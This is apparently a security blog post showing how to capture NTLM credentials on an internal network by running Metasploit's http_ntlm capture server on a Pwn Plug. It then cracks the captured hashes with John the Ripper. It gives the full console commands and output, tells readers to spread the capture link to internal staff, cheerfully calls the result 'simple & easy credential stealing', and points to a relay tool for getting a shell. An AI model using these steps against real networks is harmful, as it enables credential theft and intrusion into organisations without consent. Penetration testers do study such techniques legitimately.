Capturing Integrated Windows Authentication with the Plug

The fine folks over at the Gentleman’s Hacker’s Club recently dropped a fun tidbit about the GoDaddy URL Shortener leaking NTLM creds over the Internet.  It’s worth mentioning that the vulnerability of the browser auto-submitting credentials isn’t just specific to GoDaddy but rather to anyone using an IE browser connected to a domain. It’s odd that credentials were being submitted over the internet, but this is presumably specific to their URL shortener setup.

It turns out that capturing NTLM credentials is a very relevant attack vector, especially on internal networks. The reason the Windows browser submits creditials is something called Integrated Windows Authentication. This turns out to work particularly well on internal networks, as the default is to allow authentication in the local LAN. Here’s a quick demo of how to test for it using the Pwn Plug:

First, open up a shell, and fire up the metasploit framework:

root@pwnix-dev:$ cd /opt/metasploit/msf3
root@pwnix-dev:$ ./msfconsole
MSF> use auxiliary/server/capture/http_ntlm
MSF (http_ntlm)> set JOHNPWFILE /tmp/creds.txt
MSF (http_ntlm)> set URIPATH /capture
MSF (http_ntlm)> set SRVPORT 8080

Once you’ve configured the http_ntlm module, it should look something like this when you type ‘info’:

 

Run exploit -z in order to start the server and you should see:

[*] Auxiliary module execution completed
[*] Using URL: http://0.0.0.0:8080/capture
[*]  Local IP: http://10.0.0.196:8080/capture
[*] Server started.

Great, now we’re capturing any credentials sent to the Plug. Even if Integrated Windows Authentication isn’t configured, the user browsing to this site will see an authentication prompt.

Simply send out your link to internal folks, or post it to some location where it will be noticed and clicked. Distribution is left as an exercise for the reader.

Once we have some captured credentials in our /tmp/cred.txt file, we’ll want to fire up John the Ripper, and get to cracking. You’ll want to pull down the latest John / jumbo patch in order to crack the NTLM hashes, so grab the latest.

    pwnie@pwnix-dev:$ wget http://www.openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz
    pwnie@pwnix-dev:$ tar -zxvf john-1.7.9-jumbo-7.tar.gz
    pwnie@pwnix-dev:$ cd john-1.7.9-jumbo-7/src
    pwnie@pwnix-dev:~/john-1.7.9-jumbo-7/src$ make generic
    pwnie@pwnix-dev:~/john-1.7.9-jumbo-7/src$ cd ../run

    pwnie@pwnix-dev:~/john-1.7.9-jumbo-7/run:$ ./john /tmp/creds.txt_netntlm
    Loaded 2 password hashes with no different salts (NTLMv1 C/R MD4 DES (ESS MD5) [32/64])
    test             (test)
    test             (test)
    guesses: 2  time: 0:00:00:00 DONE (Fri Jan 18 09:47:10 2013)  c/s: 70600  trying: test!!! - tst

And there you have it, simple & easy credential stealing.

If you want to take this attack a little further, take a look at @zfasel’s ZackAttack project which relays credentials to the domain, allowing you to easily pop a shell via a submitted NTLM credential.

0 replies

Leave a Reply

Want to join the discussion?
Feel free to contribute!

Leave a Reply

Your email address will not be published. Required fields are marked *